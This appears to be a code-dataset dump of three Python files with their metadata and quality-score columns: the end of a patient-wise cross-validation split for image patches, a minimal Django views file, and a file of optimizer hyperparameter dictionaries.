train_ref, test_ref = dRefPatches[train_index], dRefPatches[test_index]
train_art, test_art = dArtPatches[train_index], dArtPatches[test_index]
train_ref_fold.append(train_ref)
train_art_fold.append(train_art)
test_ref_fold.append(test_ref)
test_art_fold.append(test_art)
# crossvalidation with separate patient
elif sSplitting == 'crossvalidation_patient':
if test_index == -1:
unique_pats = np.unique(allPats)
else:
unique_pats = [test_index]
for ind_split in unique_pats:
train_index = np.where(allPats != ind_split)[0]
test_index = np.where(allPats == ind_split)[0]
train_ref, test_ref = dRefPatches[train_index], dRefPatches[test_index]
train_art, test_art = dArtPatches[train_index], dArtPatches[test_index]
train_ref_fold.append(train_ref)
train_art_fold.append(train_art)
test_ref_fold.append(test_ref)
test_art_fold.append(test_art)
train_ref_fold = np.asarray(train_ref_fold, dtype='f')
train_art_fold = np.asarray(train_art_fold, dtype='f')
test_ref_fold = np.asarray(test_ref_fold, dtype='f')
test_art_fold = np.asarray(test_art_fold, dtype='f')
return train_ref_fold, test_ref_fold, train_art_fold, test_art_fold
| 43.207895 | 220 | 0.570437 | 3,762 | 32,838 | 4.800372 | 0.057416 | 0.087713 | 0.038873 | 0.047843 | 0.895454 | 0.889473 | 0.888421 | 0.883991 | 0.882275 | 0.882275 | 0 | 0.018403 | 0.309976 | 32,838 | 759 | 221 | 43.264822 | 0.778587 | 0.127657 | 0 | 0.844488 | 0 | 0 | 0.028324 | 0.001617 | 0 | 0 | 0 | 0.001318 | 0 | 1 | 0.007874 | false | 0.017717 | 0.017717 | 0 | 0.051181 | 0.009843 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
62e8c6282d9cd7b929f699748f336d5ff1e0f6ff | 205 | py | Python | pages/views.py | mahanfarzaneh2000/Freelara | 803cd0e75c5c03ee23ed6dea5202f3e6a7af4864 | [
"Apache-2.0"
] | null | null | null | pages/views.py | mahanfarzaneh2000/Freelara | 803cd0e75c5c03ee23ed6dea5202f3e6a7af4864 | [
"Apache-2.0"
] | null | null | null | pages/views.py | mahanfarzaneh2000/Freelara | 803cd0e75c5c03ee23ed6dea5202f3e6a7af4864 | [
"Apache-2.0"
] | 1 | 2021-04-11T09:59:54.000Z | 2021-04-11T09:59:54.000Z | from django.shortcuts import render
# Create your views here.
def index_view(request):
return render(request,'pages/index.html')
def about_view(request):
return render(request,'pages/about.html') | 25.625 | 45 | 0.760976 | 29 | 205 | 5.310345 | 0.586207 | 0.142857 | 0.220779 | 0.298701 | 0.454545 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126829 | 205 | 8 | 46 | 25.625 | 0.860335 | 0.112195 | 0 | 0 | 0 | 0 | 0.176796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
1a21ac066b34d35321cec45406243f71325063b3 | 2,823 | py | Python | hp.py | Tommy-Liu/MovieQA_Contest | 4281bf4a731aa14a0d19f18adda31d59a4a297cb | [
"MIT"
] | null | null | null | hp.py | Tommy-Liu/MovieQA_Contest | 4281bf4a731aa14a0d19f18adda31d59a4a297cb | [
"MIT"
] | null | null | null | hp.py | Tommy-Liu/MovieQA_Contest | 4281bf4a731aa14a0d19f18adda31d59a4a297cb | [
"MIT"
] | null | null | null | hp01 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 64,
'opt': 'powersign-ld',
'reg': 0.01,
'loss': 'sparse_softmax',
}
hp02 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 128,
'opt': 'powersign-ld',
'reg': 0.01,
'loss': 'sparse_softmax',
}
hp03 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 256,
'opt': 'powersign-ld',
'reg': 0.01,
'loss': 'sparse_softmax',
}
hp04 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 512,
'opt': 'powersign-ld',
'reg': 0.01,
'loss': 'sparse_softmax',
}
hp05 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 4,
'opt': 'addsign-ld',
'reg': 0.1,
}
hp06 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 4,
'opt': 'powersign-ld',
'reg': 0.1,
}
hp07 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 8,
'opt': 'addsign-ld',
'reg': 0.1,
}
hp08 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 8,
'opt': 'powersign-ld',
'reg': 0.1,
}
hp09 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 2,
'opt': 'addsign-ld',
'reg': 0.1,
'loss': 'sparse_softmax',
}
hp10 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 2,
'opt': 'powersign-ld',
'reg': 0.1,
'loss': 'sparse_softmax',
}
hp11 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 3,
'opt': 'powersign-ld',
'reg': 0.1,
}
hp12 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 3,
'opt': 'addsign-ld',
'reg': 0.1,
}
hp13 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 1.5,
'opt': 'powersign-ld',
'reg': 0.1,
}
hp14 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 1.5,
'opt': 'addsign-ld',
'reg': 0.1,
}
hp15 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 1,
'opt': 'powersign-ld',
'reg': 0.1,
}
hp16 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 1,
'opt': 'addsign-ld',
'reg': 0.1,
}
| 20.911111 | 32 | 0.514701 | 372 | 2,823 | 3.674731 | 0.120968 | 0.140454 | 0.163862 | 0.175567 | 0.945135 | 0.945135 | 0.823702 | 0.788588 | 0.788588 | 0.680322 | 0 | 0.089362 | 0.250797 | 2,823 | 134 | 33 | 21.067164 | 0.556974 | 0 | 0 | 0.731343 | 0 | 0 | 0.442083 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |